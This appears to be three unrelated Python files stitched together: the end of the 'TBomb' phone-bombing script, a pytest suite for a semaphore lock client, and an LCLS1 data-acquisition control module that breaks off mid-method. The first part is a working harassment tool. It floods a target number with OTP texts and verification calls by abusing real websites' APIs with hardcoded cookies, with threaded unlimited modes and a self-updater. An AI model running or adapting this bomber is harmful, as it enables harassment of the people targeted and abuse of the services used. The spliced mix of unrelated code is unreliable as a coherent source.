        rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
        return rd.lower().find("y") != -1
    elif lim == 103:
        # BUGFIX: the curl command string was broken across a raw newline
        # (a SyntaxError); the URL is now part of the same literal.
        os.system(
            'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
        return True
    elif lim == 104:
        # BUGFIX: os.popen(...).read() already returns str in Python 3;
        # the old .decode('utf-8') raised AttributeError.
        rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read()
        return rd.lower().strip().find('callmade') != -1
    elif lim == 106:
        rd = os.popen(
            'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
        return rd.find("1") != -1
    # Unknown / unimplemented API index (e.g. 105).
    return False
def remsp(num):
    """Return *num* with every space and hyphen stripped out."""
    return num.replace(' ', '').replace('-', '')
def start(target, counter, delay, ch, cc):
    """Main bombing loop: keep firing APIs from `ch` until enough succeed.

    target  -- phone number (without country code)
    counter -- requested number of successful sends
    delay   -- seconds to sleep between attempts
    ch      -- mutable list of candidate API indices; failed ones are removed
    cc      -- country calling code as a string (no '+')
    """
    clr()
    banner()
    failed = 0
    requested = 0
    success = int(requested) - int(failed)
    # NOTE(review): bombs = counter + 1 and the `<` test below mean the loop
    # stops after counter + 1 successes, one more than asked for — confirm
    # whether this off-by-one is intentional.
    bombs = int(counter) + 1
    while success < (int(bombs)):
        os.system('clear')
        banner()
        try:
            # random.choice raises IndexError once every API has been
            # removed from `ch` — that's the "all APIs expired" case below.
            api = random.choice(ch)
        except Exception:
            if cc == "91":
                print('Sorry All APIs Have Expired Please Update TBomb')
                input('Press Enter To Exit...')
                exit()
            else:
                # Non-Indian numbers: distinguish "partially worked" from
                # "nothing worked at all".
                if success > 0:
                    print(
                        '\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
                    print(
                        '\nWe Are Working Too Hard To Increase The International Limit...')
                    input(
                        '\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
                    os.system('rm *.xxx* > /dev/null 2>&1')
                    print('\n\n')
                    banner()
                    exit()
                else:
                    print('\n\n\tSorry Your Country is Not Supported...')
                    print(
                        '\t\tPlease Send A Mail To ggspeedx29@gmail.com To Let Us Know...')
                    input('Press Enter To Exit...')
                    exit()
        # Status dashboard, redrawn every attempt in a random colour.
        print(random.choice(colors))
        print("==================================================================")
        print("  BOMBING in progress, please wait !!                             ")
        print("   Please keep your data connection active during bombing !!      ")
        print("==================================================================")
        print(" Target Number           : +" + str(cc) + " ", target)
        print(" Number of Requests Sent : ", requested)
        print(" Successful Requests     : ", success)
        print(" Failed Requests         : ", failed)
        print("==================================================================")
        print("        Use this for fun, not for revenge !!                      ")
        print("        This Bomber Was Created By SpeedX !!                      ")
        print("==================================================================")
        try:
            result = getapi(target, api, cc)
        except Exception:
            result = False
        requested = requested + 1
        if result:
            success = success + 1
        else:
            failed = failed + 1
            # Retire the dead API so it is never picked again.
            while ch.count(api) > 0:
                ch.remove(api)
        time.sleep(float(delay))
        # Periodically make sure we still have connectivity.
        if requested % 3 == 0:
            checkinternet()
    print(W)
    print('\n\nBombing Completed..')
    os.system('rm *.xxx* > /dev/null 2>&1')
    banner()
    exit()
def update():
    """Self-update: download the latest bomber.py and .version from GitHub,
    overwrite the local copies, then exit so the user reruns the new code.
    """
    stuff_to_update = ['bomber.py', '.version']
    for fl in stuff_to_update:
        dat = urllib.request.urlopen(
            "https://raw.githubusercontent.com/TheSpeedX/TBomb/master/" + fl).read()
        # Use a context manager so the file handle is closed (and buffers
        # flushed) even if the write fails — the original leaked the handle
        # on error.
        with open(fl, 'wb') as file:
            file.write(dat)
    print('\n\t\tUpdated Successfull !!!!')
    print('\tPlease Run The Script Again...')
    exit()
# ---------------------------------------------------------------------------
# Script entry flow: connectivity check, self-update, input collection, then
# dispatch to the SMS/call bombing loops.
# ---------------------------------------------------------------------------
clr()
banner()
# Abort early when there is no working internet connection at all.
try:
    urllib.request.urlopen('https://www.google.com')
except Exception:
    print("You are not connected To Internet!!!")
    print("\tPlease Connect To Internet To Continue...\n")
    input('Exiting....\n Press Enter To Continue....')
    exit()
print('\tChecking For Updates...')
# Compare the remote version marker with the local .version file; any
# mismatch (or missing local file) triggers a self-update.
ver = urllib.request.urlopen(
    "https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.version").read().decode('utf-8')
verl = ''
try:
    verl = open(".version", 'r').read()
except Exception:
    pass
if ver != verl:
    print('\n\t\tAn Update is Available....')
    print('\tStarting Update...')
    update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting TBomb...\n\n')
# Best-effort: show a broadcast notification from the repo, if any.
try:
    noti = urllib.request.urlopen(
        "https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.notify").read().decode('utf-8')
    noti = noti.upper().strip()
    if len(noti) > 10:
        print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
    pass
# Input loop: re-prompt until country code and phone number look valid.
while True:
    pn = ""
    cc = input("\tEnter Your Country Code (Without +) : ")
    if '+' in cc:
        # Drop a leading '+' if the user typed one anyway.
        tc = list(cc)
        tc.remove('+')
        cc = ''.join(tc)
    cc = cc.strip()
    pn = input("\tEnter Target Number: +" + cc + " ")
    pn = remsp(pn)
    if len(cc) >= 4 or len(cc) < 1:
        print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
        continue
    if len(pn) <= 6:
        print('\n\nInvalid Phone Number..\n')
        continue
    # NOTE(review): this digit check is broken — `continue` restarts the
    # *for* loop, not the outer while, so non-digit input only prints the
    # message and is then accepted by the unconditional `break` below.
    for cch in str(cc + pn):
        if not cch.isdigit():
            print('\n\nPhone Number Must Consist Of Numbers Only\n')
            continue
    break
# NOTE(review): `type` shadows the builtin; 1 == call bomb, 0 == SMS bomb,
# selected via an optional "call" command-line argument.
type = 0
try:
    if sys.argv[1] == "call":
        type = 1
except Exception:
    type = 0
if type == 1:
    nm = int(input("Enter Number of Calls To Send(Maximum 15): "))
    if nm > 15:
        print("\t\tYou Have Entered " + str(nm) +
              ".\n\tNormalizing Value To 15")
        nm = 15
    dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
elif type == 0:
    # Indian numbers (cc 91) support the "unlimited" threaded mode (nm == 0).
    if cc == "91":
        nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
        dl = float(
            input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
    else:
        nm = int(input("Enter Number of Messages To Send: "))
        dl = float(
            input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
# Hard cap on total messages: 500 for India, 100 elsewhere.
maxlim = 0
if cc == "91":
    maxlim = 500
else:
    maxlim = 100
if nm > maxlim:
    print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
          str(maxlim) + ' SMS At Once...\n\n')
    print('Number Of SMS Has been Set To ' + str(maxlim))
    nm = maxlim
# --- Non-Indian numbers: restricted API subset, no call bombing. ---
if not cc.strip() == "91":
    if type == 1:
        print(
            '\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
        print()
        input('Press Enter To Exit....')
        print('\n\n')
        banner()
        exit()
    cnt = 0
    if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
        print('\n\n\tSeems Like You Have Given Wrong Inputs...')
        input('\n\t\tPress Enter To Exit...')
        banner()
        exit()
    # Only these API indices work internationally.
    ch = [0, 14, 15, 16]
    start(pn, nm, dl, ch, str(cc))
    exit()
# --- Indian numbers: full API pool 0-16. ---
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
    print('\n\n\tSeems Like You Have Given Wrong Inputs...')
    input('\n\t\tPress Enter To Exit...')
    banner()
    exit()
if type == 1:
    print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
    print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
    cbomb = True
if cbomb:
    # Call-bombing uses the 100-series API indices.
    chl = [100, 101, 102, 103, 104, 105, 106]
    start(pn, nm, dl, chl, str(cc))
    exit()
if nm == 0:
    # Unlimited mode: spawn `nt` daemon threads running `infinite`, then
    # watch the shared counter until it exceeds maxlim.
    nt = int(input("\tNumber Of Threads(10 to 20) : "))
    if nt <= 0 or nt >= 30:
        print('\tTBomb Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
    print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
    t = [None] * nt
    print(random.choice(colors))
    print("\n\n==================================================================")
    print("  Gearing Up Bomber, please wait !!                             ")
    print("   Please keep your data connection active during bombing !!      ")
    print("==================================================================")
    print(" Target Number           : +91", pn)
    print(" Number of Threads       : ", nt)
    print(" Delay                   : ", dl)
    print("==================================================================")
    print("        Use this for fun, not for revenge !!                      ")
    print("        This Bomber Was Created By SpeedX !!                      ")
    print("==================================================================")
    print(W)
    input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
    os.system('rm *.xxx* > /dev/null 2>&1')
    print("\n\nStarting Bomb....")
    for i in range(nt):
        t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
        t[i].daemon = True
        t[i].start()
    time.sleep(2)
    ci = 0
    while True:
        ci += 1
        l = count_inf
        print(" Total Number of Requests Sent : ", l)
        if int(l) > maxlim:
            print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
                  str(maxlim) + ' SMS At Once...\n\n')
            input('Press Enter To Exit...')
            os.system('rm *xxx* > /dev/null 2>&1')
            banner()
            exit()
        time.sleep(1)
        if ci % 3 == 0:
            checkinternet()
else:
    # Finite SMS mode for Indian numbers.
    start(pn, nm, dl, ch, '91')
    exit()
|
test_lock.py | """Test the client's `lock` interface."""
from datetime import timedelta
from tempfile import NamedTemporaryFile
from threading import Thread
from time import sleep
import pytest # type: ignore
from throttle_client import Client, heartbeat, Peer, Timeout, lock
from . import BASE_URL, cargo_main, throttle_client
def test_error_on_leasing_unknown_semaphore():
    """
    Verify which error we receive when acquiring a semaphore for a resource
    unknown to the server.
    """
    # Empty [semaphores] section: the server knows no semaphore at all.
    with throttle_client(b"[semaphores]") as client:
        with pytest.raises(Exception, match=r"Unknown semaphore"):
            with lock(client, "Unknown"):
                pass
def test_remainder():
    """
    Acquiring a lock must decrement the semaphore's remainder while held,
    and releasing it must restore the full count.
    """
    with throttle_client(b"[semaphores]\nA=1") as client:
        assert client.remainder("A") == 1
        with lock(client, "A"):
            assert client.remainder("A") == 0
        assert client.remainder("A") == 1
def test_multiple_semaphores_remainder():
    """
    Locks on distinct semaphores are acquired and released independently.
    """
    with throttle_client(b"[semaphores]\nA=1\nB=1\nC=1") as client:
        with lock(client, "A"):
            assert client.remainder("A") == 0
            with lock(client, "B"):
                assert client.remainder("B") == 0
                with lock(client, "C"):
                    assert client.remainder("C") == 0
        # Everything released again: each semaphore is back to full count.
        for sem in ("A", "B", "C"):
            assert client.remainder(sem) == 1
def test_server_recovers_pending_lock_after_state_loss():
    """
    Verify pending leases recover from server state loss and are acquired after reboot.
    """
    acquired_lease = False
    def acquire_lease_concurrent(client):
        # Runs in a background thread; flips the flag once the lock is held.
        with lock(client, "A", timeout=timedelta(seconds=10)):
            nonlocal acquired_lease
            acquired_lease = True
    # delete=False so the restarted server can re-read the config file.
    with NamedTemporaryFile(delete=False) as cfg:
        cfg.write(b"[semaphores]\nA=1")
        cfg.close()
        client = Client(BASE_URL)
        with cargo_main(cfg=cfg.name) as proc:
            first = client.new_peer()
            # Acquire first peer
            client.acquire(first, "A")
            # Acquire second lease
            t = Thread(target=acquire_lease_concurrent, args=[client])
            t.start()
            # Give the acquire request some time to go through, so we hit the edge case
            # of getting an 'Unknown peer' response from the server
            sleep(4)
            proc.kill()
        # Invoking this context manager anew terminates and restarts the server. I.e.
        # it's losing all its state. Note that we started the thread t within the old
        # context and join the pending lease in the new one.
        with cargo_main(cfg=cfg.name):
            # Instead of releasing the first lease, we restarted the server. We don't
            # have a heartbeat for the first lease, so semaphore should be taken by the
            # lease acquired in thread t, if we are able to recover from server reboot
            # during pending leases on the client side.
            t.join()
            assert acquired_lease
def test_keep_lease_alive_beyond_expiration():
    """
    Validates that a heartbeat keeps the lease alive beyond the initial
    expiration time.
    """
    with throttle_client(b"[semaphores]\nA=1") as client:
        client.expiration_time = timedelta(seconds=1)
        # heartbeat_interval=0 means the heartbeat fires continuously.
        with lock(client, "A", heartbeat_interval=timedelta(seconds=0)) as _:
            sleep(1.5)
            # Even though enough time has passed, our lease should not be
            # expired, thanks to the heartbeat.
            assert client.remove_expired() == 0
def test_litter_collection():
    """
    Verify that leases don't leak thanks to litter collection
    """
    with throttle_client(
        (b'litter_collection_interval="10ms"\n' b"[semaphores]\n" b"A=1\n")
    ) as client:
        # Acquire lease, but since we don't use the context manager we never release
        # it.
        peer = client.new_peer()
        client.expiration_time = timedelta(seconds=0.1)
        _ = client.acquire(peer, "A")
        # No worry: the server's litter collection will clean it up for us.
        sleep(0.2)
        assert client.remainder("A") == 1
def test_lock_count_larger_one():
    """
    A lock with count > 1 must decrement the semaphore by that count while
    held and restore the full count on release.
    """
    with throttle_client(b"[semaphores]\nA=5") as client:
        with lock(client, "A", count=3):
            assert 2 == client.remainder("A")
        assert 5 == client.remainder("A")
def test_lock_count_larger_pends_if_count_is_not_high_enough():
    """
    Assert that we do not overspend a semaphore using lock counts > 1. Even if the
    semaphore count is > 0.
    """
    with throttle_client(b"[semaphores]\nA=5") as client:
        one = client.new_peer()
        two = client.new_peer()
        # 3 of 5 taken; a second acquire of 3 must pend (remainder is only 2).
        _ = client.acquire(one, "A", count=3)
        assert not client.acquire(two, "A", count=3)
def test_exception():
    """
    Assert that lock is freed in the presence of exceptions in the client code
    """
    with throttle_client(b"[semaphores]\nA=1") as client:
        try:
            with lock(client, "A"):
                raise Exception()
        except Exception:
            # NOTE(review): the assertion lives inside `except`, so if no
            # exception were raised the test would pass vacuously.
            assert client.remainder("A") == 1
def test_lock_count_larger_than_full_count():
    """
    Requesting more than the semaphore's full count must raise immediately,
    rather than accepting a lock which would pend forever.
    """
    with throttle_client(b"[semaphores]\nA=1") as client:
        with pytest.raises(ValueError, match="block forever"):
            # A count of 2 can never be satisfied by a size-1 semaphore.
            peer = client.new_peer()
            client.acquire(peer, "A", count=2)
def test_try_lock():
    """
    Assert that a call to lock raises a Timeout exception if pending too long.
    """
    with throttle_client(b"[semaphores]\nA=1") as client:
        # We hold the lease, all following calls are going to block
        first = client.new_peer()
        client.acquire(first, "A")
        with pytest.raises(Timeout):
            with lock(client, "A", timeout=timedelta(seconds=1)):
                pass
def test_recover_from_unknown_peer_during_acquisition_lock():
    """
    The lock interface must recreate the peer if it is removed from the server,
    between `new_peer` and acquire.
    """
    acquired_lease = False

    def acquire_lease_concurrent(client):
        with lock(client, "A", timeout=timedelta(seconds=10)):
            nonlocal acquired_lease
            acquired_lease = True

    # Trigger `UnknownPeer` using litter collection. Let the peer expire really fast
    with throttle_client(
        b'litter_collection_interval="10ms"\n' b"[semaphores]\nA=1"
    ) as client:
        # Next peer should expire immediately
        client.expiration_time = timedelta(seconds=0)
        t = Thread(target=acquire_lease_concurrent, args=[client])
        t.start()
        # Give `new_peer` some time to go through, so we hit the edge case of getting an
        # 'Unknown peer' response from the server during `acquire`.
        sleep(2)
        client.expiration_time = timedelta(minutes=5)
        t.join(timeout=10)
        assert acquired_lease
def test_peer_recovery_after_server_reboot():
    """
    Heartbeat must restore peers, after server reboot.
    """
    # Server is shutdown. Boot a new one which does not know about this peer
    with throttle_client(b"[semaphores]\nA=1") as client:
        # Bogus peer id. Presumably from a peer created before the server reboot.
        peer = Peer(42, client, {"A": 1})
        with heartbeat(peer, interval=timedelta(milliseconds=10)):
            # Wait for heartbeat and restore, to go through
            sleep(2)
            # Which implies the remainder of A being 0
            assert client.remainder("A") == 0
def test_nested_locks():
    """
    Nested locks sharing one peer should acquire and release independently.
    """
    with throttle_client(b"[semaphores]\nA=1\nB=1") as client:
        with lock(client, "A") as owner:
            # Only A is held so far.
            assert client.remainder("A") == 0
            assert client.remainder("B") == 1
            with lock(client, "B", peer=owner):
                # Both semaphores held by the same peer.
                assert client.remainder("A") == 0
                assert client.remainder("B") == 0
            # Inner lock released: B is free again, A still held.
            assert client.remainder("A") == 0
            assert client.remainder("B") == 1
        # Everything released.
        assert client.remainder("A") == 1
        assert client.remainder("B") == 1
def test_multiple_peer_recovery_after_server_reboot():
    """
    Heartbeat must restore all locks for a peer, after server reboot.
    """
    # Server is shutdown. Boot a new one which does not know about the peers
    with throttle_client(b"[semaphores]\nA=1\nB=1\nC=1") as client:
        # Bogus peer id. Presumably from a peer created before the server reboot.
        peer = Peer(42, client, {"A": 1, "B": 1, "C": 1})
        with heartbeat(peer, interval=timedelta(milliseconds=10)):
            # Wait for heartbeat and restore, to go through
            sleep(2)
            # Which implies the remainder of A, B, C being 0
            assert client.remainder("A") == 0
            assert client.remainder("B") == 0
            assert client.remainder("C") == 0
"""
This module defines a control interface for the LCLS1 DAQ.
"""
import enum
import functools
import logging
import os
import time
import threading
from importlib import import_module
from ophyd.status import Status
from ophyd.utils import StatusTimeoutError, WaitTimeoutError
from . import ext_scripts
from .ami import set_pyami_filter, set_monitor_det
logger = logging.getLogger(__name__)
pydaq = None
# Wait up to this many seconds for daq to be ready for a begin call
BEGIN_TIMEOUT = 15
# Do not allow begins within this many seconds of a stop
BEGIN_THROTTLE = 1
# Not-None sentinal for default value when None has a special meaning
# Indicates that the last configured value should be used
_CONFIG_VAL = object()
def check_connect(f):
    """
    Decorator to ensure that the `Daq` is connected before running a method.

    If the daq is not connected, `Daq.connect` is attempted once; if that
    also fails, ``RuntimeError`` is raised instead of calling the wrapped
    method.
    """
    @functools.wraps(f)
    def wrapper(self, *args, **kwargs):
        logger.debug('Checking for daq connection')
        if not self.connected:
            msg = 'DAQ is not connected. Attempting to connect...'
            logger.info(msg)
            self.connect()
        if self.connected:
            logger.debug('Daq is connected')
            return f(self, *args, **kwargs)
        else:
            err = 'Could not connect to DAQ'
            logger.error(err)
            raise RuntimeError(err)
    return wrapper
class DaqTimeoutError(Exception):
    """Raised when the daq takes too long to begin or finish acquiring."""
    pass
class Daq:
    """
    The LCLS1 daq as a ``bluesky``-compatible object.

    This uses the ``pydaq`` module to connect with a running daq instance,
    controlling it via socket commands.

    It can be used as a ``Reader`` in a ``bluesky`` plan to take data at
    discrete scan points.

    It can be used as a ``Flyer`` in a ``bluesky`` plan to have the daq start
    at the beginning of the run and end at the end of the run.

    Unlike normal ``bluesky`` readable devices or flyers, this has no data to
    report to the ``RunEngine`` on the ``read`` or ``collect`` calls. No data
    will pass into the python layer from the daq.

    Parameters
    ----------
    RE: ``RunEngine``, optional
        Set ``RE`` to the session's main ``RunEngine``
    """
    # Maps pydaq's integer state codes to readable names (see `state`).
    _state_enum = enum.Enum('PydaqState',
                            'Disconnected Connected Configured Open Running',
                            start=0)
    # Baseline configuration used before the first `configure` call.
    default_config = dict(events=None,
                          duration=None,
                          use_l3t=False,
                          record=None,
                          controls=None,
                          begin_sleep=0)
    # ``bluesky`` device-interface attributes.
    name = 'daq'
    parent = None
    def __init__(self, RE=None):
        # Import pydaq lazily so this module can be imported on hosts that
        # do not have the daq software installed.
        if pydaq is None:
            globals()['pydaq'] = import_module('pydaq')
        super().__init__()
        self._control = None        # pydaq.Control handle; set in `connect`
        self._config = None         # last applied configuration dict
        self._desired_config = {}   # queued changes for the next configure
        self._reset_begin()
        self._host = os.uname()[1]  # hostname used to locate the daq
        self._RE = RE
        self._re_cbid = None        # RunEngine subscription id (see `stage`)
        self._config_ts = {}        # bluesky-style timestamped config readback
        self._update_config_ts()
        self._pre_run_state = None  # state cached at stage time
        self._last_stop = 0         # timestamp of last stop, for throttling
        self._check_run_number_has_failed = False
        register_daq(self)
# Convenience properties
    @property
    def connected(self):
        """
        ``True`` if the daq is connected, ``False`` otherwise.
        """
        # A live pydaq.Control handle is our definition of "connected".
        return self._control is not None
    @property
    def configured(self):
        """
        ``True`` if the daq is configured, ``False`` otherwise.
        """
        # `configure` stores its result in _config; `disconnect` clears it.
        return self._config is not None
@property
def config(self):
"""
The current configuration, e.g. the last call to `configure`
"""
if self.configured:
return self._config.copy()
else:
return self.default_config.copy()
@property
def next_config(self):
"""
The next queued configuration.
This can be different than `config` if we have queued up a
configuration to be run on the next begin.
"""
cfg = self.config
cfg.update(self._desired_config)
return cfg
@property
def state(self):
"""
State as reported by the daq. Can be any of the following:
- ``Disconnected``: No active session in python
- ``Connected``: Active session in python
- ``Configured``: Connected, and the daq has been configured
- ``Open``: We are in the middle of a run
- ``Running``: We are collecting data in a run
"""
if self.connected:
logger.debug('calling Daq.control.state()')
num = self._control.state()
return self._state_enum(num).name
else:
return 'Disconnected'
# Interactive methods
    def connect(self):
        """
        Connect to the live DAQ, giving full control to the Python process.

        To undo this, you may call `disconnect`.
        """
        logger.debug('Daq.connect()')
        err = False
        conn = False
        if self._control is None:
            # We don't know the platform number; probe 0-5 until one works.
            for plat in range(6):
                try:
                    logger.debug(('instantiate Daq.control '
                                  '= pydaq.Control(%s, %s)'),
                                 self._host, plat)
                    self._control = pydaq.Control(self._host, platform=plat)
                    logger.debug('Daq.control.connect()')
                    self._control.connect()
                    logger.info('Connected to DAQ')
                    conn = True
                    break
                except Exception as exc:
                    # 'query' in the message indicates an allocation problem
                    if 'query' in str(exc):
                        err = True
                        logger.error(('Failed to connect: DAQ is not '
                                      'allocated!'))
            if not (err or conn):
                err = True
                logger.error(('Failed to connect: DAQ is not running on this '
                              'machine, and is not allocated!'))
            if err:
                # Clean up the half-constructed control object on failure.
                logger.debug('del Daq.control')
                del self._control
                self._control = None
        else:
            logger.info('Connect requested, but already connected to DAQ')
    def disconnect(self):
        """
        Disconnect from the live DAQ, giving control back to the GUI.

        This is the opposite of `connect`.
        """
        logger.debug('Daq.disconnect()')
        if self._control is not None:
            self.end_run()
            self._control.disconnect()
        del self._control
        self._control = None
        # Keep the old config queued so a reconnect can restore it.
        self._desired_config = self._config or {}
        self._config = None
        logger.info('DAQ is disconnected.')
    @check_connect
    def wait(self, timeout=None):
        """
        Pause the thread until the DAQ is done aquiring.

        Parameters
        ----------
        timeout: ``float``
            Maximum time to wait in seconds.

        Raises
        ------
        DaqTimeoutError
            If the daq does not finish within ``timeout``.
        RuntimeError
            If the daq is configured to run forever (nothing to wait for).
        """
        logger.debug('Daq.wait()')
        if self.state == 'Running':
            if self._events or self._duration:
                status = self._get_end_status()
                try:
                    status.wait(timeout=timeout)
                except (StatusTimeoutError, WaitTimeoutError):
                    msg = (f'Timeout after {timeout} seconds waiting for daq '
                           'to finish acquiring.')
                    raise DaqTimeoutError(msg) from None
            else:
                raise RuntimeError('Cannot wait, daq configured to run '
                                   'forever.')
    def begin(self, events=_CONFIG_VAL, duration=_CONFIG_VAL,
              record=_CONFIG_VAL, use_l3t=_CONFIG_VAL, controls=_CONFIG_VAL,
              wait=False, end_run=False):
        """
        Start the daq and block until the daq has begun acquiring data.

        Optionally block with ``wait=True`` until the daq has finished aquiring
        data. If blocking, a ``ctrl+c`` will end the run and clean up.

        If omitted, any argument that is shared with `configure`
        will fall back to the configured value.

        Internally, this calls `kickoff` and manages its ``Status`` object.

        Parameters
        ----------
        events: ``int``, optional
            Number events to take in the daq.
        duration: ``int``, optional
            Time to run the daq in seconds, if ``events`` was not provided.
        record: ``bool``, optional
            If ``True``, we'll configure the daq to record data before this
            run.
        use_l3t: ``bool``, optional
            If ``True``, we'll run with the level 3 trigger. This means that
            if we specified a number of events, we will wait for that many
            "good" events as determined by the daq.
        controls: ``dict{name: device}`` or ``list[device...]``, optional
            If provided, values from these will make it into the DAQ data
            stream as variables. We will check ``device.position`` and
            ``device.value`` for quantities to use and we will update these
            values each time begin is called. To provide a list, all devices
            must have a ``name`` attribute.
        wait: ``bool``, optional
            If ``True``, wait for the daq to finish aquiring data. A
            ``KeyboardInterrupt`` (``ctrl+c``) during this wait will end the
            run and clean up.
        end_run: ``bool``, optional
            If ``True``, we'll end the run after the daq has stopped.
        """
        logger.debug(('Daq.begin(events=%s, duration=%s, record=%s, '
                      'use_l3t=%s, controls=%s, wait=%s)'),
                     events, duration, record, use_l3t, controls, wait)
        try:
            # Temporarily override the record setting for just this run.
            # old_record is only bound when we do this; the finally block
            # deliberately relies on NameError to skip the restore otherwise.
            if record is not _CONFIG_VAL and record != self.record:
                old_record = self.record
                self.preconfig(record=record, show_queued_cfg=False)
            begin_status = self.kickoff(events=events, duration=duration,
                                        use_l3t=use_l3t, controls=controls)
            try:
                begin_status.wait(timeout=self._begin_timeout)
            except (StatusTimeoutError, WaitTimeoutError):
                msg = (f'Timeout after {self._begin_timeout} seconds waiting '
                       'for daq to begin.')
                raise DaqTimeoutError(msg) from None

            # In some daq configurations the begin status returns very early,
            # so we allow the user to configure an emperically derived extra
            # sleep.
